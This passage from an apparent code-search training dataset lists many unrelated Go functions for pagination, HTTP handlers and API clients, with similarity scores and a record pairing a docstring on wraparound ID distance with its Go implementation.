_, page := range pages {\n\t\turl := page.GetUrl()\n\n\t\tif strings.HasSuffix(url, \"/\") {\n\t\t\turl += \"index.html\"\n\t\t}\n\n\t\tlayout := page.GetLayout()\n\n\t\t// Make sure the posts's parent dir exists\n\t\td := filepath.Join(s.Dest, filepath.Dir(url))\n\t\tf := filepath.Join(s.Dest, url)\n\t\tif err := os.MkdirAll(d, 0755); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// Data passed in to each template\n\t\tdata := map[string]interface{}{\n\t\t\t\"site\": s.Conf,\n\t\t\t\"page\": page,\n\t\t}\n\n\t\t// Treat all non-markdown pages as templates\n\t\tcontent := page.GetContent()\n\t\tif isMarkdown(page.GetExt()) == false {\n\t\t\t// this code will add the page to the list of templates,\n\t\t\t// will execute the template, and then set the content\n\t\t\t// to the rendered template\n\n\t\t\tif s.templ == nil {\n\t\t\t\treturn fmt.Errorf(\"No templates defined for page: %s\", url)\n\t\t\t}\n\n\t\t\tt, err := s.templ.New(url).Parse(content)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tvar buf bytes.Buffer\n\t\t\terr = t.ExecuteTemplate(&buf, url, data)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tcontent = buf.String()\n\t\t}\n\n\t\t// add document body to the map\n\t\tdata[\"content\"] = content\n\n\t\t// write the template to a buffer\n\t\t// NOTE: if template is nil or empty, then we should parse the\n\t\t// content as if it were a template\n\t\tvar buf bytes.Buffer\n\t\tif layout == \"\" || layout == \"nil\" {\n\t\t\t//t, err := s.templ.New(url).Parse(content);\n\t\t\t//if err != nil { return err }\n\t\t\t//err = t.ExecuteTemplate(&buf, url, data);\n\t\t\t//if err != nil { return err }\n\n\t\t\tbuf.WriteString(content)\n\t\t} else {\n\t\t\tlayout = appendExt(layout, \".html\")\n\t\t\ts.templ.ExecuteTemplate(&buf, layout, data)\n\t\t}\n\n\t\tlogf(MsgGenerateFile, url)\n\t\tif err := ioutil.WriteFile(f, buf.Bytes(), 0644); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// Append posts to the feed. Posts are any page with a date field.\n\t\tvar postTime time.Time\n\t\tif date := page.Get(\"date\"); date != nil {\n\t\t\tpostTime = date.(time.Time)\n\t\t}\n\t\tif !postTime.IsZero() {\n\t\t\tfeed.Add(&feeds.Item{\n\t\t\t\tTitle: page.GetTitle(),\n\t\t\t\tLink: &feeds.Link{Href: page.GetUrl()},\n\t\t\t\tDescription: page.GetDescription(),\n\t\t\t\tAuthor: &feeds.Author{Name: page.GetString(\"author\")},\n\t\t\t\tCreated: postTime,\n\t\t\t})\n\t\t}\n\t}\n\n\t// Write feed to atom.xml.\n\tatom, err := feed.ToAtom()\n\tif err != nil {\n\t\treturn err\n\t}\n\tfeedPath := \"atom.xml\"\n\tif err := ioutil.WriteFile(filepath.Join(s.Dest, feedPath), []byte(atom), 0644); err != nil {\n\t\treturn err\n\t}\n\tlogf(MsgGenerateFeed, feedPath)\n\n\treturn nil\n}", "func (h WorkloadHandler) List(ctx *gin.Context) {\n}", "func GetPage(w http.ResponseWriter, r *http.Request) {\n\tresponse := services.LoadPage(r)\n\n\trender.Status(r, response.Code)\n\trender.JSON(w, r, response)\n}", "func newAllProcPage() *allProcPage {\n\tpage := &allProcPage{\n\t\tGrid: ui.NewGrid(),\n\t\tProcTable: viz.NewTable(),\n\t}\n\tpage.init()\n\treturn page\n}", "func RenderArticleList(rootPath string, articles Collections, tagName string) {\n\tdefer wg.Done()\n\t// Create path\n\tpagePath := filepath.Join(publicPath, rootPath)\n\tos.MkdirAll(pagePath, 0777)\n\t// Split page\n\tlimit := globalConfig.Site.Limit\n\ttotal := len(articles)\n\tpage := total / limit\n\trest := total % limit\n\tif rest != 0 {\n\t\tpage++\n\t}\n\tif total < limit {\n\t\tpage = 1\n\t}\n\tfor i := 0; i < page; i++ {\n\t\tvar prev = filepath.Join(rootPath, \"page\"+strconv.Itoa(i)+\".html\")\n\t\tvar next = filepath.Join(rootPath, \"page\"+strconv.Itoa(i+2)+\".html\")\n\t\toutPath := filepath.Join(pagePath, \"index.html\")\n\t\tif i != 0 {\n\t\t\tfileName := \"page\" + strconv.Itoa(i+1) + \".html\"\n\t\t\toutPath = filepath.Join(pagePath, fileName)\n\t\t} else {\n\t\t\tprev = \"\"\n\t\t}\n\t\tif i == 1 {\n\t\t\tprev = filepath.Join(rootPath, \"index.html\")\n\t\t}\n\t\tfirst := i * limit\n\t\tcount := first + limit\n\t\tif i == page-1 {\n\t\t\tif rest != 0 {\n\t\t\t\tcount = first + rest\n\t\t\t}\n\t\t\tnext = \"\"\n\t\t}\n\t\tvar data = map[string]interface{}{\n\t\t\t\"Articles\": articles[first:count],\n\t\t\t\"Site\": globalConfig.Site,\n\t\t\t\"Develop\": globalConfig.Develop,\n\t\t\t\"Page\": i + 1,\n\t\t\t\"Total\": page,\n\t\t\t\"Prev\": prev,\n\t\t\t\"Next\": next,\n\t\t\t\"TagName\": tagName,\n\t\t\t\"TagCount\": len(articles),\n\t\t}\n\t\twg.Add(1)\n\t\tgo RenderPage(pageTpl, data, outPath)\n\t}\n}", "func ListHandler(w http.ResponseWriter, r *http.Request) {\n\t_, _, ok := r.BasicAuth()\n\tif !ok {\n\t\tw.Header().Set(\"WWW-Authenticate\", fmt.Sprintf(`Basic realm=\"%s\"`, BasicAuthRealm))\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\tw.Write([]byte(http.StatusText(http.StatusUnauthorized) + \"\\n\"))\n\t\treturn\n\t}\n\tif !reqIsAdmin(r) {\n\t\thttp.Error(w, http.StatusText(http.StatusUnauthorized), http.StatusUnauthorized)\n\t\treturn\n\t}\n\toff := 0\n\tlim := 50\n\tvar of string\n\tvar li string\n\tvar err error\n\tif r.FormValue(\"offset\") != \"\" {\n\t\tof = r.FormValue(\"offset\")\n\t\toff, err = strconv.Atoi(of)\n\t\tif err != nil {\n\t\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\t\treturn\n\t\t}\n\t}\n\tif r.FormValue(\"limit\") != \"\" {\n\t\tli = r.FormValue(\"limit\")\n\t\tlim, err = strconv.Atoi(li)\n\t\tif err != nil {\n\t\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\t\treturn\n\t\t}\n\t}\n\n\tusrs, err := List(off, lim)\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\tjd, jerr := json.Marshal(&usrs)\n\tif jerr != nil {\n\t\thttp.Error(w, jerr.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\tfmt.Fprintf(w, string(jd))\n}", "func (c *Client) List(page int, limit int) (List, error) {\n\tURL := c.url\n\tif page != 0 || limit != 0 {\n\t\tif page != 0 {\n\t\t\tURL.RawQuery = url.QueryEscape(strconv.Itoa(page))\n\t\t}\n\t\tif limit != 0 {\n\t\t\tURL.RawQuery = url.QueryEscape(strconv.Itoa(limit))\n\t\t}\n\t}\n\tres, err := c.get(c.url.String())\n\tif err != nil {\n\t\treturn List{}, err\n\t}\n\tlist := List{}\n\terr = json.Unmarshal(res, &list)\n\treturn list, err\n}", "func (c *Index) AddPage(data *ParseData) error {\n\tp := Page{\n\t\tTitle: data.Title,\n\t\tSlug: data.Slug,\n\t\tContent: data.Content(),\n\t\tResolver: c.Resolver,\n\t}\n\n\tc.Pages = append(c.Pages, p)\n\tc.PageBySlug[p.Slug] = &p\n\treturn nil\n}", "func (s *Site) Pages() (out []Page) {\n\tfor _, d := range s.docs {\n\t\tif p, ok := d.(Page); ok {\n\t\t\tout = append(out, p)\n\t\t}\n\t}\n\treturn\n}", "func (a App) Posts(res http.ResponseWriter, req *http.Request, _ httprouter.Params) {\n\n\t// easier to do\n\ttmpl := buildView(\"posts\")\n\n\t// Loop through rows using only one struct\n\trows, err := db.Query(\"SELECT * FROM posts\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdefer rows.Close()\n\n\tfor rows.Next() {\n\t\tvar p Post\n\n\t\tif err := rows.Scan(&p.Id, &p.Title, &p.Body); err != nil {\n\t\t\tlog.Println(err.Error())\n\t\t}\n\n\t\tposts = append(posts, p)\n\t}\n\n\t//////\n\tpd := PageData{\n\t\tPageTitle: \"Hello Gophercon!\",\n\t\tPosts: posts,\n\t}\n\n\t// easier to understand what's going on??\n\terr = tmpl.ExecuteTemplate(res, \"layout\", pd)\n\tif err != nil {\n\t\thttp.Error(res, err.Error(), http.StatusInternalServerError)\n\t}\n\n}", "func getURLsfromPageWithName( name string ) ([]string, error) {\n\n\turlList := []string{}\n\n\tindex := 1\n\tfor {\n\t\turl := fmt.Sprintf(apiURLFormat, name, index)\n\t\tcontents, err := downloadContentsfromURL(url)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Unable to download contents %s\\n\", err.Error())\n\t\t\t//return nil, err\n\t\t\tbreak\n\t\t}\n\n\t\tvar resp IViewSeriesSubResponse\n\t\terr = json.Unmarshal([]byte(contents), &resp)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Unable to unmarshal contents %s\\n\", err.Error())\n\t\t\tbreak\n\t\t}\n\n\t\tfor _, ep := range resp.Embedded.VideoEpisodes {\n\t\t\tnewUrl := fmt.Sprintf(urlTemplate, ep.HouseNumber)\n\t\t\turlList = append(urlList, newUrl)\n\t\t}\n\n\t\t// next page of links.\n\t\tindex++\n\t}\n\n\tuniqueList := uniqueStringList(urlList)\n\n\treturn uniqueList, nil\n}", "func NewPage(in php_serialize.PhpArray) (Page, error) {\n\tentries := make([]EntryRef, 0)\n\n\tfor key, val := range in[\"entries\"].(php_serialize.PhpArray) {\n\t\tentries = append(entries, NewEntryRef(php_serialize.PhpValueString(key), php_serialize.PhpValueString(val)))\n\t}\n\n\treturn Page{\n\t\tTotal: php_serialize.PhpValueInt64(in[\"total\"]),\n\t\tPerpage: php_serialize.PhpValueInt64(in[\"perpage\"]),\n\t\tEntries: entries,\n\t}, nil\n}", "func GetPeopleByPage(w http.ResponseWriter, r *http.Request) {\n\tmyDb, err := db.StartDB(\"mydb.db\")\n\tif err != nil {\n\t\tfmt.Printf(\"Fail in open database: %v\\n\", err)\n\t\treturn\n\t}\n\n\t// Verify token\n\ttoken := r.Header.Get(\"AuthToken\")\n\tif (!myDb.IsLogIn([]byte(token))) {\n\t\tfmt.Printf(\"Unauthorized: %v\\n\", err)\n\t\t// 401: Unauthorized\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\treturn\n\t}\n\t\n\t// Get people by page\n\tr.ParseForm()\n\tpage, err := strconv.Atoi(r.Form[\"page\"][0])\n\n\tdata := myDb.SearchByPage(\"people\", page)\n\tif data != nil {\n\t\tfmt.Printf(\"Read body error: %v\\n\", err)\n\t\tw.WriteHeader(http.StatusNotFound)\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\tw.WriteHeader(http.StatusOK)\n}", "func getList(w io.Writer, r *http.Request) error {\n\tc := appengine.NewContext(r)\n\n\t// Get the list id from the URL.\n\tid := mux.Vars(r)[\"list\"]\n\n\t// Decode the obtained id into a datastore key.\n\tkey, err := datastore.DecodeKey(id)\n\tif err != nil {\n\t\treturn appErrorf(http.StatusBadRequest, \"invalid list id\")\n\t}\n\n\t// Fetch the list from the datastore.\n\tlist := &List{}\n\terr = datastore.Get(c, key, list)\n\tif err == datastore.ErrNoSuchEntity {\n\t\treturn appErrorf(http.StatusNotFound, \"list not found\")\n\t}\n\tif err != nil {\n\t\treturn fmt.Errorf(\"fetch list: %v\", err)\n\t}\n\n\t// Set the ID field with the id from the request url and encode the list.\n\tlist.ID = id\n\treturn json.NewEncoder(w).Encode(&list)\n}", "func (client *GroupMgmtClient) listPost(\n\tpath string,\n\tpayload *DataWrapper,\n\tqueryParams map[string]string,\n\tparams *param.GetParams,\n) (interface{}, error) {\n\t// build the url\n\turl := fmt.Sprintf(\"%s/%s/detail\", client.URL, path)\n\t// Post it\n\tresponse, err := client.Client.R().\n\t\tSetQueryParams(queryParams).\n\t\tSetHeader(\"X-Auth-Token\", client.SessionToken).\n\t\tSetBody(payload).\n\t\tPost(url)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn processResponse(client, response, path, nil, params)\n}", "func (pagedList *PagedList) GetPage(pageNumber int) (*Embed, error) {\n\tif err := pagedList.Check(); err != nil {\n\t\treturn nil, err\n\t}\n\tif pageNumber <= 0 {\n\t\treturn nil, fmt.Errorf(\"Page number %d too low.\", pageNumber)\n\t}\n\tif pageNumber > int(math.Ceil(float64(len(pagedList.Items))/float64(pagedList.MaxResults))) {\n\t\treturn nil, fmt.Errorf(\"Page number %d too high.\", pagedList.PageNumber)\n\t}\n\n\tpagedList.TotalPages = int(math.Ceil(float64(len(pagedList.Items)) / float64(pagedList.MaxResults)))\n\tif pageNumber > pagedList.TotalPages {\n\t\treturn nil, fmt.Errorf(\"Page number %d too high.\", pageNumber)\n\t}\n\n\tpagedList.PageNumber = pageNumber\n\tif pageNumber == 1 {\n\t\tpagedList.FirstPage = true\n\t\tpagedList.LastPage = false\n\t} else if pageNumber == pagedList.TotalPages {\n\t\tpagedList.FirstPage = false\n\t\tpagedList.LastPage = true\n\t} else {\n\t\tpagedList.FirstPage = false\n\t\tpagedList.LastPage = false\n\t}\n\n\tlow := (pagedList.PageNumber - 1) * pagedList.MaxResults\n\thigh := pagedList.PageNumber * pagedList.MaxResults\n\tif high > len(pagedList.Items) {\n\t\thigh = len(pagedList.Items)\n\t}\n\n\tpageItems := pagedList.Items[low:high]\n\tpageEmbed := NewEmbed()\n\tpageEmbed.Fields = pageItems\n\treturn pageEmbed, nil\n}", "func (env *Env) GetPosts(w http.ResponseWriter, r *http.Request) {\n\tstart, err := strconv.Atoi(r.URL.Query().Get(\"s\"))\n\tif err != nil {\n\t\tstart = 0\n\t}\n\tend, err := strconv.Atoi(r.URL.Query().Get(\"e\"))\n\tif err != nil {\n\t\tend = 10\n\t}\n\tp, err := env.DB.GetPosts(start, end)\n\tif err != nil {\n\t\tenv.log(r, err)\n\t\tw.WriteHeader(http.StatusNotFound)\n\t\treturn\n\t}\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\tjson.NewEncoder(w).Encode(p)\n}", "func getTopPeople(w http.ResponseWriter, r *http.Request) {\n\tpage, _ := strconv.Atoi(r.URL.Query().Get(\"page\"))\n\n\tif page == 0 {\n\t\tpage = 1\n\t}\n\n\tparser, err := MalService.GetTopPeople(page)\n\n\tif err != nil {\n\t\tview.RespondWithJSON(w, parser.ResponseCode, err.Error(), nil)\n\t} else {\n\t\tview.RespondWithJSON(w, parser.ResponseCode, parser.ResponseMessage.Error(), parser.Data)\n\t}\n}", "func getEntries(URL string, page, limit int) ([]model.Entry, error) {\n\tentries := make([]model.Entry, 0)\n\n\tfor {\n\t\tresp, err := http.Get(URL + strconv.Itoa(page))\n\t\tif err != nil {\n\t\t\treturn nil, errors.New(\"ERROR: internet bağlantınızı kontrol edin\")\n\t\t}\n\n\t\troot, err := html.Parse(resp.Body)\n\t\tif err != nil {\n\t\t\treturn nil, errors.New(\"ERROR: An error occured while parsing body\")\n\t\t}\n\t\tdefer resp.Body.Close()\n\n\t\tif _, ok := scrape.Find(root, isTopicFoundMatcher); !ok {\n\t\t\treturn nil, errors.New(\"ERROR: \" + strconv.Itoa(page) + \". sayfa yok\")\n\t\t}\n\n\t\tentryList, ok := scrape.Find(root, entryListMatcher)\n\t\tif !ok {\n\t\t\treturn nil, errors.New(\"ERROR: Site layoutu değişmiş olabilir | Report: github.com/mucanyu/eksisozluk-go/issues\")\n\t\t}\n\n\t\tentryNodeList := scrape.FindAll(entryList, entryMatcher)\n\n\t\tfor _, enode := range entryNodeList {\n\t\t\tentry := model.Entry{}\n\t\t\tentry.Text = scrape.Text(enode)\n\n\t\t\tautNode, ok := scrape.Find(enode.Parent, authorMatcher)\n\t\t\tif ok {\n\t\t\t\tentry.Author = scrape.Text(autNode)\n\t\t\t}\n\n\t\t\tdateNode, ok := scrape.Find(enode.Parent, dateMatcher)\n\t\t\tif ok {\n\t\t\t\tentry.Date = scrape.Text(dateNode)\n\t\t\t}\n\n\t\t\tentries = append(entries, entry)\n\t\t\tlimit--\n\t\t\tif limit == 0 {\n\t\t\t\treturn entries, nil\n\t\t\t}\n\t\t}\n\t\tif len(entries)%10 != 0 {\n\t\t\treturn entries, nil\n\t\t}\n\t\tpage++\n\t}\n}", "func (a *SitesOnenotePagesNotebookApiService) SitesOnenotePagesParentNotebookSectionsListPages(ctx _context.Context, siteId string, onenotePageId string, onenoteSectionId string, localVarOptionals *SitesOnenotePagesParentNotebookSectionsListPagesOpts) (CollectionOfOnenotePage, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfOnenotePage\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/sites({site-id})/onenote/pages({onenotePage-id})/parentNotebook/sections({onenoteSection-id})/pages\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"site-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", siteId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenotePage-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenotePageId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenoteSection-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenoteSectionId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfOnenotePage\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func processRESTApiResult(body []byte, isMultiple bool) (page []Page) {\n\tif isMultiple {\n\t\trecord := MultiplePageResponseREST{}\n\t\tjsonErr := json.Unmarshal(body, &record)\n\t\tif jsonErr != nil || len(record.Pages) == 0 {\n\t\t\treturn getNotFound()\n\t\t}\n\n\t\tcollection := []Page{}\n\t\tfor _, page := range record.Pages {\n\t\t\tcollection = append(collection, Page{\n\t\t\t\tpage.Titles.Normalized,\n\t\t\t\tstrings.TrimSpace(page.Extract),\n\t\t\t\tpage.Thumbnail.Source,\n\t\t\t\tpage.ContentUrls.Desktop.Page,\n\t\t\t\t0})\n\t\t}\n\t\treturn collection\n\t}\n\n\t// Single result\n\trecord := PageResponseREST{}\n\tjsonErr := json.Unmarshal(body, &record)\n\tif jsonErr != nil || record.Title == \"Not found.\" {\n\t\treturn getNotFound()\n\t}\n\treturn []Page{{record.Titles.Normalized, strings.TrimSpace(record.Extract), record.Thumbnail.Source, record.ContentUrls.Desktop.Page, 0}}\n}", "func (m *settings) getLinks(w http.ResponseWriter, r *http.Request) {\n\tvar s string\n\tfor _, v := range m.redirects {\n\t\ts += fmt.Sprintf(\"Shortname: %s -> Url: %s Count %d <BR>\", v.Shortname, v.Url, v.Requests)\n\t}\n\tsendHtml(w, s)\n}", "func getLinkPage(title string, targetAPI *Config, plcontinue *string) (*LinkResponse, error) {\n\tu, _ := url.Parse(targetAPI.APIRoot)\n\tu.Scheme = targetAPI.Protocol\n\n\tq := u.Query()\n\tq.Set(\"action\", \"query\")\n\tq.Set(\"titles\", title)\n\tq.Set(\"prop\", \"links\")\n\tq.Set(\"pllimit\", \"max\")\n\tq.Set(\"format\", \"json\")\n\n\tif plcontinue != nil {\n\t\tq.Set(\"plcontinue\", *plcontinue)\n\t}\n\n\tu.RawQuery = q.Encode()\n\n\tres, reqErr := http.Get(u.String())\n\n\tif reqErr != nil {\n\t\tfmt.Println(\"Request failed!\")\n\t\treturn nil, reqErr\n\t}\n\n\tdefer res.Body.Close()\n\n\tbody, readBodyErr := ioutil.ReadAll(res.Body)\n\tif readBodyErr != nil {\n\t\tfmt.Println(\"Can't read response body!\")\n\t\treturn nil, readBodyErr\n\t}\n\n\tdata := LinkResponse{}\n\tjsonParseErr := json.Unmarshal(body, &data)\n\tif jsonParseErr != nil {\n\t\tfmt.Println(\"Invalid json!\")\n\t\treturn nil, readBodyErr\n\t}\n\n\treturn &data, nil\n}", "func (page *ListPage) Next() error {\n\treturn page.NextWithContext(context.Background())\n}", "func (page ListPage) Response() List {\n\treturn page.l\n}", "func (_p *ArticlePage) GetPage(direction string) (ps []Article, err error) {\n\tswitch direction {\n\tcase \"previous\":\n\t\tps, _ = _p.Previous()\n\tcase \"next\":\n\t\tps, _ = _p.Next()\n\tcase \"current\":\n\t\tps, _ = _p.Current()\n\tdefault:\n\t\treturn nil, errors.New(\"Error: wrong dircetion! None of previous, current or next!\")\n\t}\n\treturn\n}" ]
[ "0.64121014", "0.6053224", "0.5971785", "0.59450006", "0.58816975", "0.5828093", "0.5775039", "0.575437", "0.5751406", "0.5750042", "0.57327384", "0.5730634", "0.57283455", "0.57073927", "0.5698735", "0.56935793", "0.56563675", "0.5623424", "0.56171405", "0.5606726", "0.5606568", "0.5591462", "0.5589387", "0.55858094", "0.5542863", "0.55347884", "0.55287975", "0.55237406", "0.5506677", "0.55064404", "0.5499722", "0.54888225", "0.54813", "0.54751384", "0.544764", "0.5426256", "0.54079485", "0.53874236", "0.53831106", "0.5380658", "0.53805405", "0.53669643", "0.5355314", "0.5307862", "0.5304441", "0.5296806", "0.5296294", "0.5289547", "0.5278701", "0.52582455", "0.5250375", "0.5241154", "0.52323073", "0.5220289", "0.52132934", "0.5205776", "0.51995164", "0.51995164", "0.51923233", "0.5189707", "0.5188875", "0.51870716", "0.517207", "0.51685876", "0.5167993", "0.5160528", "0.515379", "0.51321775", "0.5130352", "0.5127519", "0.5126286", "0.51259047", "0.5124932", "0.51186347", "0.51080257", "0.5107511", "0.5105655", "0.5086636", "0.50846314", "0.50799596", "0.5079402", "0.5073694", "0.50730187", "0.50722486", "0.50721264", "0.5069469", "0.50678474", "0.50634384", "0.5058526", "0.50563693", "0.50396204", "0.5036097", "0.5033014", "0.50320923", "0.50297564", "0.50262064", "0.50234014", "0.5022939", "0.5020699", "0.5018602", "0.5017215" ]
0.0
-1
idDistance calculates the distance of a and b accounting for wraparound using max. Wraparound means that a may be closer to b if they traveled through max. The lowest value of the following is returned: |a b| max a + b + 1 max b + a + 1 Expressions that evaluate to be larger than max are ignored to prevent overflowing.
func idDistance(a, b id.ID, max id.ID) id.ID { // Wrap distance will always be smaller when a > b so // swap the two if that doesn't hold. if id.Compare(a, b) < 0 { return idDistance(b, a, max) } var ( one = id.ID{Low: 1} directDist = absSub(b, a) maxDist = idSub(max, a) ) // Don't wrap around if b+1 or (max-a)+b+1 would overflow. if addOverflows(b, one, max) || addOverflows(maxDist, idAdd(b, one), max) { return directDist } wraparoundDist := idAdd(maxDist, idAdd(b, one)) // Return the smaller of direct and wraparound distance. if id.Compare(wraparoundDist, directDist) < 0 { return wraparoundDist } return directDist }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (id ID) Distance(other ID) (result ID) {\n\tdistance := new(big.Int)\n\tdistance = distance.Xor(id.Int(), other.Int())\n\tresult, _ = NewID(distance.Bytes())\n\treturn\n}", "func (kademliaID KademliaID) CalcDistance(target *KademliaID) *KademliaID {\n\tresult := KademliaID{}\n\tfor i := 0; i < ID_LEN; i++ {\n\t\tresult[i] = kademliaID[i] ^ target[i]\n\t}\n\treturn &result\n}", "func (kademliaID KademliaID) CalcDistance(target *KademliaID) *KademliaID {\n\tresult := KademliaID{}\n\tfor i := 0; i < IDLength; i++ {\n\t\tresult[i] = kademliaID[i] ^ target[i]\n\t}\n\treturn &result\n}", "func (kademliaID KademliaID) CalcDistance(target *KademliaID) *KademliaID {\n\tresult := KademliaID{}\n\tfor i := 0; i < IDLength; i++ {\n\t\tresult[i] = kademliaID[i] ^ target[i]\n\t}\n\treturn &result\n}", "func (kademliaID *KademliaID) CalcDistance(target *KademliaID) *KademliaID {\n\n\tresult := KademliaID{}\n\n\tfor i := 0; i < IDLength; i++ {\n\n\t\tresult[i] = kademliaID[i] ^ target[i]\n\t}\n\n\treturn &result\n}", "func Distance(a, b uint64) uint64 {\n\tvar dist uint64\n\tfor val := a ^ b; val != 0; val &= val - 1 {\n\t\tdist++\n\t}\n\treturn dist\n}", "func (nodeID NodeID) CalcDistance(target *NodeID) *NodeID {\n\tresult := NodeID{}\n\tfor i := 0; i < IDLength; i++ {\n\t\tresult[i] = nodeID[i] ^ target[i]\n\t}\n\treturn &result\n}", "func LevenshteinDistanceMax(a, b string, max int) (int, bool) {\n\tv, wasMax, _ := LevenshteinDistanceMaxReuseSlice(a, b, max, nil)\n\treturn v, wasMax\n}", "func digDist(p1, p2 Coord) int {\n return max(abs(p1.x-p2.x)+abs(p1.y-p2.y)-1, 0)\n}", "func Max(x, y int64) int64 {\n\treturn x ^ ((x ^ y) & ((x - y) >> 63))\n}", "func main() {\n\tfmt.Println(maxDistToClosest([]int{1, 0, 0, 0, 1, 0, 1}))\n\tfmt.Println(maxDistToClosest([]int{1, 0, 0, 0}))\n\tfmt.Println(maxDistToClosest([]int{0, 0, 0, 1}))\n}", "func 